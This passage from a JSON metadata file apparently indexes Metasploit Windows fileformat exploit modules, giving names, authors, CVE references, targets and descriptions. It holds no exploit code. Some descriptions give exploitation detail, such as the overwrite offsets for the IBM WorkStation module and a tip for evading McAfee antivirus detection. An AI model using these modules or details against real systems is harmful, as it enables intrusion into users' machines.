false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/greenshot_deserialize_cve_2023_34634": { + "name": "Greenshot .NET Deserialization Fileformat Exploit", + "fullname": "exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-07-26", + "type": "exploit", + "author": [ + "p4r4bellum", 
+ "bwatters-r7" + ], + "description": "There exists a .NET deserialization vulnerability in Greenshot version 1.3.274\n and below. The deserialization allows the execution of commands when a user opens\n a Greenshot file. The commands execute under the same permissions as the Greenshot\n service. Typically, is the logged in user.", + "references": [ + "CVE-2023-34634", + "EDB-51633" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-08-17 08:48:42 +0000", + "path": "/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/greenshot_deserialize_cve_2023_34634", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/gsm_sim": { + "name": "GSM SIM Editor 5.15 Buffer Overflow", + "fullname": "exploit/windows/fileformat/gsm_sim", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-07", + "type": "exploit", + "author": [ + "Ruben Alejandro", + "chap0 ", + "Lincoln " + ], + "description": "This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.\n When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer\n overflow occurs which allows an attacker to execute arbitrary code.", + "references": [ + "CVE-2015-1171", + "OSVDB-81161", + "EDB-14258" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/gsm_sim.rb", + "is_install_path": true, + "ref_name": 
"windows/fileformat/gsm_sim", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/gta_samp": { + "name": "GTA SA-MP server.cfg Buffer Overflow", + "fullname": "exploit/windows/fileformat/gta_samp", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-18", + "type": "exploit", + "author": [ + "Silent_Dream" + ], + "description": "This module exploits a stack-based buffer overflow in GTA SA-MP Server.\n This buffer overflow occurs when the application attempts to open a malformed\n server.cfg file. To exploit this vulnerability, an attacker must send the\n victim a server.cfg file and have them run samp-server.exe.", + "references": [ + "OSVDB-83433", + "EDB-17893" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "GTA SA-MP (samp-server) v0.3.1.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/gta_samp.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/gta_samp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/hhw_hhp_compiledfile_bof": { + "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", + "fullname": "exploit/windows/fileformat/hhw_hhp_compiledfile_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-02-06", + "type": "exploit", + "author": [ + "bratax", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n By creating a specially crafted hhp file, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2006-0564", + "OSVDB-22941", + "EDB-1488", + "EDB-1490" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + 
"autofilter_services": [], + "targets": [ + "Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/hhw_hhp_contentfile_bof": { + "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", + "fullname": "exploit/windows/fileformat/hhw_hhp_contentfile_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-02-06", + "type": "exploit", + "author": [ + "bratax", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.", + "references": [ + "CVE-2006-0564", + "OSVDB-22941", + "EDB-1470", + "EDB-1495" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/hhw_hhp_contentfile_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/hhw_hhp_indexfile_bof": { + "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", + "fullname": "exploit/windows/fileformat/hhw_hhp_indexfile_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-01-17", + "type": "exploit", + "author": [ + "Encrypt3d.M!nd", + "loneferret", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.", + "references": [ + 
"CVE-2009-0133", + "BID-33189", + "OSVDB-22941", + "EDB-10323", + "EDB-10335" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/hhw_hhp_indexfile_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/homm3_h3m": { + "name": "Heroes of Might and Magic III .h3m Map file Buffer Overflow", + "fullname": "exploit/windows/fileformat/homm3_h3m", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-07-29", + "type": "exploit", + "author": [ + "Pierre Lindblad", + "John AAkerblom" + ], + "description": "This module embeds an exploit into an uncompressed map file (.h3m) for\n Heroes of Might and Magic III. 
Once the map is started in-game, a\n buffer overflow occurring when loading object sprite names leads to\n shellcode execution.", + "references": [ + "EDB-37716" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]", + "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]", + "Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/fileformat/homm3_h3m.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/homm3_h3m", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ht_mp3player_ht3_bof": { + "name": "HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/ht_mp3player_ht3_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-06-29", + "type": "exploit", + "author": [ + "hack4love ", + "His0k4", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HT-MP3Player 1.0.\n Arbitrary code execution could occur when parsing a specially crafted\n .HT3 file.\n\n NOTE: The player installation does not register the file type to be\n handled. 
Therefore, a user must take extra steps to load this file.", + "references": [ + "CVE-2009-2485", + "OSVDB-55449", + "EDB-9034", + "EDB-9038" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HT-MP3Player 1.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ht_mp3player_ht3_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ibm_forms_viewer_fontname": { + "name": "IBM Forms Viewer Unicode Buffer Overflow", + "fullname": "exploit/windows/fileformat/ibm_forms_viewer_fontname", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-05", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability\n is due to a dangerous usage of a strcpy-like function, and occurs while parsing malformed\n XFDL files containing a long fontname value. 
This module has been tested successfully on IBM\n Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2013-5447", + "OSVDB-100732", + "ZDI-13-274", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21657500" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ibm_forms_viewer_fontname", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ibm_pcm_ws": { + "name": "IBM Personal Communications iSeries Access WorkStation 5.9 Profile", + "fullname": "exploit/windows/fileformat/ibm_pcm_ws", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-02-28", + "type": "exploit", + "author": [ + "TecR0c " + ], + "description": "The IBM Personal Communications I-Series application WorkStation is susceptible to a\n stack-based buffer overflow vulnerability within file parsing in which data copied to a\n location in memory exceeds the size of the reserved destination area. The buffer is located\n on the runtime program stack.\n\n When the WorkStation file is opened it will reach the code path at 0x67575180 located in\n pcspref.dll which conducts string manipulation and validation on the data supplied in the\n WorkStation file. The application will first check if 'Profile' header exists and appends\n a dot with the next parameter within the file. 
It will then measure the character length\n of the header by calling strcspn with a dot as its null-terminated character.\n\n It will then write the header into memory and ensure the header ends with a NUL character.\n The parameter character array is passed to the strcpy() function. The application has\n declared a 52-element character array for the destination for strcpy function. The\n function does not perform bounds checking therefore, data can be written paste the end of\n the buffer variable resulting in corruption of adjacent variables including other local\n variables, program state information and function arguments. You will notice that the\n saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.\n\n To ensure we can perform arbitrary code execution we must we provide a valid pointer at\n 0x74 which is used as an argument for the called function at 0x675751ED as an id file\n extension parameter. Once the caller regains control we will reach our RETURN. 
The Ret\n instruction will be used to pop the overwritten saved return address which was corrupted.\n\n This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.\n\n Versions tested:\n IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a\n Which bundles pcsws.exe version 5090.27271.709\n\n Tested on:\n Microsoft Windows XP [Version 5.1.2600]\n Microsoft Windows Vista [Version 6.0.6002]\n Microsoft Windows 7 [Version 6.1.7600]", + "references": [ + "CVE-2012-0201", + "OSVDB-79657", + "URL-https://www-304.ibm.com/support/docview.wss?uid=swg21586166" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM WorkStation 5.9 (Windows XP SP3)", + "IBM WorkStation 5.9 (Windows 7, Windows Vista)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ibm_pcm_ws.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ibm_pcm_ws", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/icofx_bof": { + "name": "IcoFX Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/icofx_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-10", + "type": "exploit", + "author": [ + "Marcos Accossatto", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of IcoFX. 
The vulnerability exists while parsing .ICO files, where a specially\n crafted ICONDIR header providing an arbitrary long number of images in the file\n can be used to trigger the overflow when reading the ICONDIRENTRY structures.", + "references": [ + "CVE-2013-4988", + "OSVDB-100826", + "BID-64221", + "EDB-30208", + "URL-http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IcoFX 2.5 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/icofx_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/icofx_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ideal_migration_ipj": { + "name": "PointDev IDEAL Migration Buffer Overflow", + "fullname": "exploit/windows/fileformat/ideal_migration_ipj", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-05", + "type": "exploit", + "author": [ + "Dr_IDE", + "dookie", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in versions v9.7\n through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n IDEAL Migration. 
All versions are suspected to be vulnerable.\n By creating a specially crafted ipj file, an attacker may be able\n to execute arbitrary code.\n\n NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH", + "references": [ + "CVE-2009-4265", + "OSVDB-60681", + "EDB-10319", + "EDB-12403", + "EDB-12404", + "EDB-12540" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IDEAL Migration <= 4.5.1 on Windows XP", + "IDEAL Administration <= 10.5 on Windows XP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ideal_migration_ipj", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/iftp_schedule_bof": { + "name": "i-FTP Schedule Buffer Overflow", + "fullname": "exploit/windows/fileformat/iftp_schedule_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-06", + "type": "exploit", + "author": [ + "metacom", + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n i-Ftp v2.20, caused by a long time value set for scheduled download.\n\n By persuading the victim to place a specially-crafted Schedule.xml file\n in the i-FTP folder, a remote attacker could execute arbitrary code on\n the system or cause the application to crash. 
This module has been\n tested successfully on Windows XP SP3.", + "references": [ + "EDB-35177", + "OSVDB-114279" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/iftp_schedule_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/iftp_schedule_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/irfanview_jpeg2000_bof": { + "name": "Irfanview JPEG2000 jp2 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/irfanview_jpeg2000_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-16", + "type": "exploit", + "author": [ + "Parvez Anwar ", + "mr_me ", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has\n been tested on a specific version of irfanview (v4.3.2), although other\n versions may work also. The vulnerability is triggered via parsing an\n invalid qcd chunk structure and specifying a malformed qcd size and\n data.\n\n Payload delivery and vulnerability trigger can be executed in multiple\n ways. The user can double click the file, use the file dialog, open via\n the icon and drag/drop the file into Irfanview's window. 
An egg hunter\n is used for stability.", + "references": [ + "CVE-2012-0897", + "OSVDB-78333", + "BID-51426", + "URL-http://www.greyhathacker.net/?p=525" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Irfanview 4.32 / Plugins 4.32 / Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/irfanview_jpeg2000_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ispvm_xcf_ispxcf": { + "name": "Lattice Semiconductor ispVM System XCF File Handling Overflow", + "fullname": "exploit/windows/fileformat/ispvm_xcf_ispxcf", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-16", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way\n ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially\n crafted file, when a long value is supplied for the version attribute of the ispXCF\n tag. 
It results in arbitrary code execution under the context of the user.", + "references": [ + "OSVDB-82000", + "BID-53562", + "URL-http://web.archive.org/web/20121014002756/http://secunia.com/advisories/48740/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ispvm_xcf_ispxcf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/kingview_kingmess_kvl": { + "name": "KingView Log File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/kingview_kingmess_kvl", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-20", + "type": "exploit", + "author": [ + "Lucas Apa", + "Carlos Mario Penagos Hollman", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in KingView <= 6.55. It exists in\n the KingMess.exe application when handling log files, due to the insecure usage of\n sprintf. This module uses a malformed .kvl file which must be opened by the victim\n via the KingMess.exe application, through the 'Browse Log Files' option. 
The module\n has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over\n Windows XP SP3.", + "references": [ + "CVE-2012-4711", + "OSVDB-89690", + "BID-57909", + "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/kingview_kingmess_kvl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/lattice_pac_bof": { + "name": "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow", + "fullname": "exploit/windows/fileformat/lattice_pac_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-16", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer\n 6.21. 
As a .pac file, when supplying a long string of data to the 'value' field\n under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption\n on the stack, which results in arbitrary code execution under the context of the\n user.", + "references": [ + "CVE-2012-2915", + "OSVDB-82001", + "EDB-19006", + "BID-53566", + "URL-http://web.archive.org/web/20120523175252/http://secunia.com:80/advisories/48741" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "PAC-Designer 6.21 on Windows XP SP3" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/lattice_pac_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/lattice_pac_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/lotusnotes_lzh": { + "name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", + "fullname": "exploit/windows/fileformat/lotusnotes_lzh", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-05-24", + "type": "exploit", + "author": [ + "binaryhouse.net", + "alino <26alino@gmail.com>" + ], + "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. 
This vulnerability was\n discovered binaryhouse.net", + "references": [ + "CVE-2011-1213", + "OSVDB-72706", + "BID-48018", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904", + "URL-http://www.ibm.com/support/docview.wss?uid=swg21500034" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", + "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/lotusnotes_lzh.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/lotusnotes_lzh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/magix_musikmaker_16_mmm": { + "name": "Magix Musik Maker 16 .mmm Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/magix_musikmaker_16_mmm", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-26", + "type": "exploit", + "author": [ + "acidgen", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Magix Musik Maker 16.\n When opening a specially crafted arrangement file (.mmm) in the application, an\n unsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n bypasses DEP & ASLR, and works on XP, Vista & Windows 7. 
Egghunter is used, and\n might require up to several seconds to receive a shell.", + "references": [ + "OSVDB-72063", + "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal DEP & ASLR Bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/magix_musikmaker_16_mmm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mcafee_hercules_deletesnapshot": { + "name": "McAfee Remediation Client ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/mcafee_hercules_deletesnapshot", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-08-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. 
When\n sending an overly long string to the DeleteSnapshot() method\n of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n This control is not marked safe for scripting, so choose your attack vector accordingly.", + "references": [ + "OSVDB-94540", + "EDB-16639" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mcafee_showreport_exec": { + "name": "McAfee SaaS MyCioScan ShowReport Remote Command Execution", + "fullname": "exploit/windows/fileformat/mcafee_showreport_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-12", + "type": "exploit", + "author": [ + "rgod", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in McAfee Security-as-a-Service.\n The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails\n to check the FileName argument, and passes it on to a ShellExecuteW() function,\n therefore allows any malicious attacker to execute any process that's on the\n local system. 
However, if the victim machine is connected to a remote share\n (or something similar), then it's also possible to execute arbitrary code.\n Please note that a custom template is required for the payload, because the\n default Metasploit template is detectable by McAfee -- any Windows binary, such\n as calc.exe or notepad.exe, should bypass McAfee fine.", + "references": [ + "OSVDB-78310", + "BID-51397", + "ZDI-12-012" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Internet Explorer" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mcafee_showreport_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mediacoder_m3u": { + "name": "MediaCoder .M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/mediacoder_m3u", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-24", + "type": "exploit", + "author": [ + "metacom", + "modpr0be ", + "otoy " + ], + "description": "This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution under the context\n of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder\n runs with DEP. 
This module has been tested successfully on MediaCoder 0.8.21.5539\n to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.", + "references": [ + "CVE-2017-8869", + "OSVDB-94522", + "EDB-26403" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mediacoder_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mediacoder_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mediajukebox": { + "name": "Media Jukebox 8.0.400 Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/mediajukebox", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-07-01", + "type": "exploit", + "author": [ + "Ron Henry ", + "dijital1" + ], + "description": "This module exploits a stack buffer overflow in Media Jukebox 8.0.400\n by creating a specially crafted m3u or pls file.", + "references": [ + "OSVDB-55924", + "CVE-2009-2650" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 - English", + "Windows XP SP2 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mediajukebox.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mediajukebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/microp_mppl": { + "name": "MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/microp_mppl", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-08-23", + "type": "exploit", + 
"author": [ + "James Fitts " + ], + "description": "This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n buffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n which overwrites the lpFileName parameter of a CreateFileA() function, and results\n arbitrary code execution under the context of the user.", + "references": [ + "CVE-2010-5299", + "OSVDB-73627", + "EDB-14720" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Vista / 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/microp_mppl.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/microp_mppl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/microsoft_windows_contact": { + "name": "Microsoft Windows Contact File Format Arbitary Code Execution", + "fullname": "exploit/windows/fileformat/microsoft_windows_contact", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-01-17", + "type": "exploit", + "author": [ + "John Page (aka hyp3rlinx)", + "Brenner Little" + ], + "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files node param which takes an expected website value, however if an attacker references an\n executable file it will run that instead without warning instead of performing expected web navigation. 
